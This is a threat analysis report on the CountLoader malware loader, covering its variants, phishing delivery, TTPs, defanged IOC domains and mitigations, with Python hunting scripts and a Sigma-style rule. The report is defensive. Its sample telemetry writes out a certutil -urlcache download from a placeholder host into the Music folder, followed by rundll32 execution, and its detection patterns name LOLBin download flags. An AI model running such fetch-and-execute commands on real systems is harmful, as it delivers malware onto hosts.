Malware Loader — CountLoader Threat Analysis Report — By CyberDudeBivash Date: September 19, 2025

Executive summary

CountLoader is a newly observed multi-version malware loader used to deliver post-exploitation tooling (Cobalt Strike, AdaptixC2) and remote access trojans (PureHVNC/PureRAT). It appears in at least three implementations — .NET, PowerShell, and JScript/HTA (HTML Application) — and has been distributed in PDF/ZIP phishing lures (notably a campaign impersonating Ukrainian police). Public reporting ties CountLoader activity to Russian-language ransomware ecosystems (LockBit, BlackBasta, Qilin) or to Initial Access Broker activity used by those ecosystems. (Silent Push +1)


1 — Key findings (short)

  • Multi-version loader: .NET, PowerShell, and JScript (HTML application) variants have been observed. (Silent Push +1)
  • Delivery vectors: weaponized PDFs/ZIPs and social-engineering lures (e.g., impersonating Ukrainian police, fake job offers, ClickFix pages). (Silent Push +1)
  • Post-drop payloads: Cobalt Strike, AdaptixC2, PureHVNC RAT (and other commodity malware/infostealers). (The Hacker News +1)
  • Infrastructure: more than 20 domains observed sharing a common "/api/getFile?fn=" path and other fingerprintable traits; sample domains: app-updater[.]app, app-updater1[.]app, app-updater2[.]app, ms-team-ping2[.]com, grouptelecoms[.]com, etc. (Silent Push)
  • Techniques: use of LOLBins (certutil, bitsadmin, curl, msiexec, rundll32, PowerShell, MSXML/WinHTTP), scheduled-task persistence (masquerading as a Google/Chrome update), domain-based C2 retry logic (very high retry counts). (The Hacker News +1)

2 — Technical analysis

2.1 Variants & capabilities

  • JScript / HTA version (most feature-rich): implements six download methods (curl, PowerShell, MSXML2.XMLHTTP, WinHTTP, bitsadmin, certutil) and three execution methods, enumerates the victim environment (domain detection), uses the Music folder for staging, and can download DLL/MSI payloads that are executed with rundll32.exe/msiexec.exe. (The Hacker News +1)
  • PowerShell version: previously observed by Kaspersky (June 2025 reporting) and used with "DeepSeek"-style AI phishing decoys. It includes an encrypted/obfuscated command generator and abuses LOLBins. (Silent Push)
  • .NET version: functionally similar but with a reduced feature set (supports fewer UpdateType commands, such as .zip and .exe). (Silent Push)

2.2 TTPs (high-value)

  • Initial access: phishing with weaponized PDFs or social engineering (fake police notices, job offers, ClickFix). (Silent Push +1)
  • Execution & persistence: execution via HTA and PowerShell; persistence via a scheduled task posing as a Chrome/Google updater. (The Hacker News)
  • Lateral/tools: downloads and stages Cobalt Strike, AdaptixC2, PureHVNC RAT; some payloads carry proxying/browser-traffic manipulation capabilities (BrowserVenom style). (The Hacker News)
  • Evasion: uses legitimate OS tools (certutil, bitsadmin, msiexec, rundll32), encrypted command strings, and persistent C2 retry loops to blend traffic and complicate takedown. (Silent Push +1)

3 — Indicators of Compromise (IOCs) — sample list

Domain / Host (sample extracted from public reporting; treat as TLP:AMBER — confirm with your telemetry):
app-updater[.]app, app-updater1[.]app, app-updater2[.]app, ms-team-ping2[.]com, grouptelecoms[.]com, limenlinon[.]com, misctoolsupdate[.]com, officetoolservices[.]com, onlinenetworkupdate[.]com, quasuar[.]com (Silent Push)

Network patterns / HTTP path: requests with /api/getFile?fn= used across multiple related domains (shared path fingerprint). (Silent Push)

Behavioral IOCs:

  • Creation of a scheduled task named to resemble a Google/Chrome update. (The Hacker News)
  • Staging in the %USERPROFILE%\Music\ folder (the Music folder is used as the staging ground). (The Hacker News)
  • Use of certutil/bitsadmin/curl/msiexec/rundll32 for file retrieval and execution. (The Hacker News)

Payloads commonly observed: Cobalt Strike beacons, AdaptixC2 implants, PureHVNC RAT, and various infostealers (reported alongside loader domains). (The Hacker News +1)

Important: this is a non-exhaustive IOC set. CountLoader infrastructure is actively evolving — integrate these IOCs into blocklists and watchlists, but rely primarily on behavior detection and telemetry for coverage. (Silent Push)


4 — Detection & hunting recipes (practical)

4.1 High-priority EDR / SIEM hunts

  1. Scheduled-task creation with updater-like names
    SIEM/EDR query: detect scheduled-task creation events where TaskName contains "update", "google", "chrome", or "updater" and the creating/parent process is mshta.exe, wscript.exe, cscript.exe, or powershell.exe. (Tune to reduce false positives; legitimate Google Update tasks are created by the Google updater, not by a script host.)
  2. Unusual use of LOLBins for file download + execution
    Detect certutil.exe, bitsadmin.exe, curl.exe, msiexec.exe, or rundll32.exe invoked with network-download parameters (e.g. a URL argument, certutil -urlcache, bitsadmin /transfer) shortly after mshta/wscript/powershell execution on the same host.
  3. HTTP(s) requests to /api/getFile?fn= across multiple domains
    Network telemetry: flag internal hosts making HTTP GET requests to external domains with the path /api/getFile?fn= or similar query-string patterns; the same host reaching that path on several distinct domains is a strong signal.
  4. Files staged in the Music folder
    Endpoint monitoring for creation of new executables, DLLs, or MSI files inside %USERPROFILE%\Music\ (and subfolders), especially if followed by rundll32/msiexec execution referencing that file.
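Hunts 1, 2 and 4 above, implemented over a small set of constructed endpoint events. This is an added example and not code from the report or from any vendor: the event schema (process, task_created, file_create records), the 120-second proximity window, the minimal download-argument patterns, and every sample event are assumptions chosen to show the correlation logic, not observed telemetry.

```python
"""Behavioral hunts for CountLoader-style activity over constructed endpoint telemetry.
Added example; event schema, window size and sample events are assumptions."""
import re
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
UPDATER_WORDS = ("update", "updater", "google", "chrome")
# LOLBin -> pattern marking its network-download form (assumed minimal patterns; extend as needed)
LOLBIN_DOWNLOAD = {
    "certutil.exe": re.compile(r"-urlcache|https?://", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|https?://", re.I),
    "curl.exe": re.compile(r"https?://", re.I),
    "msiexec.exe": re.compile(r"/i\s+https?://", re.I),
    "rundll32.exe": re.compile(r"https?://", re.I),
}
STAGE_EXT = (".exe", ".dll", ".msi")
WINDOW = timedelta(seconds=120)  # "shortly after": tune to your environment

# Constructed sample telemetry: WS01 shows a loader-like chain, WS02 is benign noise.
EVENTS = [
    {"ts": "2025-09-19T10:00:00", "host": "WS01", "type": "process", "image": "mshta.exe",
     "parent_image": "explorer.exe", "cmdline": "mshta.exe C:\\Users\\bob\\Downloads\\notice.hta"},
    {"ts": "2025-09-19T10:00:05", "host": "WS01", "type": "task_created",
     "task_name": "GoogleUpdateTaskMachineUA", "creator_image": "mshta.exe"},
    {"ts": "2025-09-19T10:00:10", "host": "WS01", "type": "process", "image": "certutil.exe",
     "parent_image": "mshta.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/api/getFile?fn=1 C:\\Users\\bob\\Music\\x.dll"},
    {"ts": "2025-09-19T10:00:12", "host": "WS01", "type": "file_create",
     "path": "C:\\Users\\bob\\Music\\x.dll"},
    {"ts": "2025-09-19T10:00:15", "host": "WS01", "type": "process", "image": "rundll32.exe",
     "parent_image": "mshta.exe", "cmdline": "rundll32.exe C:\\Users\\bob\\Music\\x.dll,Start"},
    {"ts": "2025-09-19T11:00:00", "host": "WS02", "type": "task_created",
     "task_name": "NightlyBackup", "creator_image": "svchost.exe"},
    {"ts": "2025-09-19T11:05:00", "host": "WS02", "type": "process", "image": "curl.exe",
     "parent_image": "cmd.exe", "cmdline": "curl.exe https://example.invalid/release.tgz -o r.tgz"},
    {"ts": "2025-09-19T11:06:00", "host": "WS02", "type": "file_create",
     "path": "C:\\Users\\alice\\Music\\song.mp3"},
]


def parse_ts(ts):
    return datetime.fromisoformat(ts)


def hunt_updater_tasks(events):
    """Hunt 1: updater-named task created by a script host -> (host, task_name, creator)."""
    hits = []
    for e in events:
        if e["type"] != "task_created":
            continue
        name = e["task_name"].lower()
        if any(w in name for w in UPDATER_WORDS) and e["creator_image"].lower() in SCRIPT_HOSTS:
            hits.append((e["host"], e["task_name"], e["creator_image"]))
    return hits


def hunt_lolbin_downloads(events):
    """Hunt 2: LOLBin with download arguments, parented by or shortly after a script host."""
    hits = []
    procs = [e for e in events if e["type"] == "process"]
    for e in procs:
        rx = LOLBIN_DOWNLOAD.get(e["image"].lower())
        if not rx or not rx.search(e["cmdline"]):
            continue
        t = parse_ts(e["ts"])
        preceded = any(p["host"] == e["host"] and p["image"].lower() in SCRIPT_HOSTS
                       and t - WINDOW <= parse_ts(p["ts"]) <= t for p in procs)
        if e["parent_image"].lower() in SCRIPT_HOSTS or preceded:
            hits.append((e["host"], e["image"], e["cmdline"]))
    return hits


def hunt_music_staging(events):
    """Hunt 4: exe/dll/msi written under \\Music\\ then run by rundll32/msiexec within WINDOW."""
    hits = []
    files = [e for e in events if e["type"] == "file_create"
             and "\\music\\" in e["path"].lower() and e["path"].lower().endswith(STAGE_EXT)]
    runners = [e for e in events if e["type"] == "process"
               and e["image"].lower() in ("rundll32.exe", "msiexec.exe")]
    for f in files:
        t = parse_ts(f["ts"])
        for p in runners:
            if (p["host"] == f["host"] and f["path"].lower() in p["cmdline"].lower()
                    and t <= parse_ts(p["ts"]) <= t + WINDOW):
                hits.append((f["host"], f["path"], p["image"]))
    return hits


if __name__ == "__main__":
    for name, fn in (("updater-task", hunt_updater_tasks),
                     ("lolbin-download", hunt_lolbin_downloads),
                     ("music-staging", hunt_music_staging)):
        for hit in fn(EVENTS):
            print(name, *hit)
```

Each hunt returns its matches as tuples so the three can be joined on host: a host that fires all three within a few minutes is the full chain described in section 2, while a single hit (for example the curl download on WS02, which has no script-host parent) stays below the alerting threshold.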

4.2 Sigma-style example (concept)

title: Suspicious Updater Task Followed by LOLBin Download
id: 8f3d5b2a-CountLoader-hunt
status: experimental
logsource:
  product: windows
  service: security               # EventID 4698 requires auditing of "Other Object Access Events"
detection:
  selection:
    EventID: 4698                 # A scheduled task was created (Windows Security log)
    TaskName|contains:            # match if the name contains ANY of these (not all at once)
      - 'update'
      - 'updater'
      - 'google'
      - 'chrome'
  condition: selection
# The "followed by LOLBin download" half of the title is a correlation step: join hits
# from this rule with the LOLBin process-creation hunt (4.1 item 2) on host and time window.
level: high

(Adapt for your SIEM and tune for noise.)

4.3 YARA (conceptual) hints

  • YARA for JScript/HTA variants: look for strings referencing multiple download methods (MSXML2.XMLHTTP, WinHttpRequest, bitsadmin, certutil), or the api/getFile?fn= literal. Avoid over-broad matching — use combined conditions.

5 — Mitigations & remediation (actionable)

Immediate (0–24 hours)

  • Block known domains at perimeter/proxy/firewall: ingest the domain list above into DNS and web proxies (and mark for takedown requests where appropriate). (Silent Push)
  • Deploy/escalate EDR rules to detect scheduled tasks created by mshta/wscript/cscript/powershell and block suspicious msiexec/rundll32 child executions. (The Hacker News)
  • Quarantine endpoints that show the /api/getFile?fn= pattern or downloads from the enumerated domains and collect full forensic artifacts (memory, disk image, network capture).

Short term (24–72 hours)

  • Hunt for secondary payloads: search telemetry for Cobalt Strike beacons (known C2 patterns), AdaptixC2 indicators, PureHVNC communications. (The Hacker News)
  • Reset/revoke credentials for any accounts suspected of compromise; rotate service credentials and MFA tokens where applicable.

Longer term / strategic

  • Block and monitor LOLBin usage via application control policies (allowlist legitimate usages, deny or alert for non-standard contexts). (The Hacker News)
  • Implement phishing resilience training that includes weaponized PDF awareness and detection of fake update lures. (Silent Push)
  • Tighten endpoint protections: enable application allowlisting, restrict mshta, wscript, certutil and bitsadmin usage to admin workflows only, and ensure EDR telemetry retention for retrospective hunts.

6 — Attribution & assessment

  • Who benefits / likely operators: Silent Push (and corroborating sources) assess that CountLoader is either an IAB toolkit or is used by ransomware affiliates linked to LockBit, BlackBasta, and Qilin — i.e., the loader benefits Russian-language ransomware operations. Confidence: medium-high, based on payload overlap (Cobalt Strike, AdaptixC2, PureHVNC) and targeting (Ukraine-themed lures). (Silent Push +1)
  • Operational risk: high for organizations with exposed employees in targeted geographies or with lax endpoint controls; CountLoader's multi-method download+execution and modular payload approach make it a flexible initial-access vector that can deliver a variety of post-exploitation tools. (Silent Push +1)

7 — Recommended detection playbook (quick checklist)

  1. Ingest the sample domain blocklist into DNS/proxy/URL filtering. (Silent Push)
  2. Add SIEM rules for /api/getFile?fn= HTTP requests and scheduled-task names imitating updaters. (Silent Push +1)
  3. Hunt for files in %USERPROFILE%\Music\ and for child processes of mshta/wscript spawning rundll32/msiexec. (The Hacker News)
  4. Search for Cobalt Strike / Adaptix / PureHVNC indicators in network telemetry and EDR. (The Hacker News)
  5. Revoke exposed credentials; notify affected business units and begin forensic triage if matches found.

Appendix — Sample IOC block

Domains:
  app-updater[.]app
  app-updater1[.]app
  app-updater2[.]app
  ms-team-ping2[.]com
  grouptelecoms[.]com
  limenlinon[.]com
  misctoolsupdate[.]com
  officetoolservices[.]com
  onlinenetworkupdate[.]com
  quasuar[.]com

HTTP path pattern:
  */api/getFile?fn=*

Detection hints:
  Look for scheduled tasks with 'update' in name created by mshta/wscript/powershell.
  Look for new executables placed under %USERPROFILE%\Music\ and immediate execution via rundll32/msiexec.

(Confirm and expand with your telemetry — IOCs are actively evolving.) (Silent Push)
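The appendix IOC block applied to proxy log lines: the defanged domains are refanged and matched (including subdomains), and the shared /api/getFile?fn= path is matched independently of domain so that new infrastructure with the same fingerprint surfaces too (hunt 3 in section 4.1). This is an added example, not tooling from the report or from Silent Push; the log line format, the sample lines, the constructed subdomain cdn.quasuar.com and the placeholder domain new-stager.invalid are assumptions.

```python
"""Match proxy log lines against the appendix IOC block (domains + shared path fingerprint).
Added example; log format and sample lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Defanged exactly as listed in the appendix; refanged before matching so the block can be pasted as-is.
DEFANGED_DOMAINS = """
app-updater[.]app
app-updater1[.]app
app-updater2[.]app
ms-team-ping2[.]com
grouptelecoms[.]com
limenlinon[.]com
misctoolsupdate[.]com
officetoolservices[.]com
onlinenetworkupdate[.]com
quasuar[.]com
"""
PATH_RX = re.compile(r"/api/getFile\?fn=", re.I)   # shared path fingerprint from the report


def refang(indicator):
    """Turn 'app-updater[.]app' / 'hxxp://' into a matchable form."""
    return indicator.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def load_iocs(text):
    return {refang(line) for line in text.splitlines() if line.strip()}


def domain_hit(host, iocs):
    """True for the IOC domain itself or any subdomain of it (not for look-alike suffixes)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


# Constructed sample lines: "<ts> <src_ip> <method> <url> <status>"
PROXY_LOG = [
    "2025-09-19T09:58:01 10.0.0.21 GET http://app-updater1.app/api/getFile?fn=setup.msi 200",
    "2025-09-19T09:58:40 10.0.0.21 GET http://cdn.quasuar.com/img/logo.png 200",        # constructed subdomain
    "2025-09-19T10:02:13 10.0.0.21 GET http://new-stager.invalid/api/getFile?fn=core.dll 200",
    "2025-09-19T10:03:00 10.0.0.44 GET https://www.example.com/api/getFile?id=7 200",
    "2025-09-19T10:04:00 10.0.0.44 GET https://updates.example.com/chrome/latest 200",
]


def scan_proxy_log(lines, iocs):
    """Return (alerts, path_domains).
    alerts: list of (src_ip, reason, url)
    path_domains: src_ip -> set of distinct domains it hit with the /api/getFile?fn= path,
    so a single host touching that path on several domains can be escalated."""
    alerts, path_domains = [], defaultdict(set)
    for line in lines:
        _ts, src, _method, url, _status = line.split()
        parts = urlsplit(url)
        host = parts.hostname or ""
        if domain_hit(host, iocs):
            alerts.append((src, "ioc-domain", url))
        if PATH_RX.search(parts.path + "?" + parts.query):
            path_domains[src].add(host)
            if not domain_hit(host, iocs):
                alerts.append((src, "getfile-path-new-domain", url))
    return alerts, dict(path_domains)


if __name__ == "__main__":
    iocs = load_iocs(DEFANGED_DOMAINS)
    alerts, by_src = scan_proxy_log(PROXY_LOG, iocs)
    for alert in alerts:
        print(*alert)
    for src, doms in by_src.items():
        print(f"{src}: {len(doms)} distinct domain(s) with the shared path fingerprint")
```

The "getfile-path-new-domain" reason is the one worth triaging first: it is how a blocklist built from today's ten domains keeps catching the loader after the operators rotate infrastructure, which the report notes they do.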


Sources & further reading

  • Silent Push: "CountLoader: Silent Push Discovers New Malware Loader Being Served in 3 Different Versions" (detailed technical writeup, domain list, behavioral notes).
  • The Hacker News: "CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader" (summary and context on payloads/attribution).
  • GBHackers / CybersecurityNews / SCWorld / CyberPress: contemporaneous reporting aggregating technical and IOC details. (GBHackers +2, Cyber Security News +2)

Hashtags: #CyberDudeBivash #CountLoader #ThreatIntel #Ransomware #MalwareLoader #IOCs #CyberSecurity #ThreatHunting
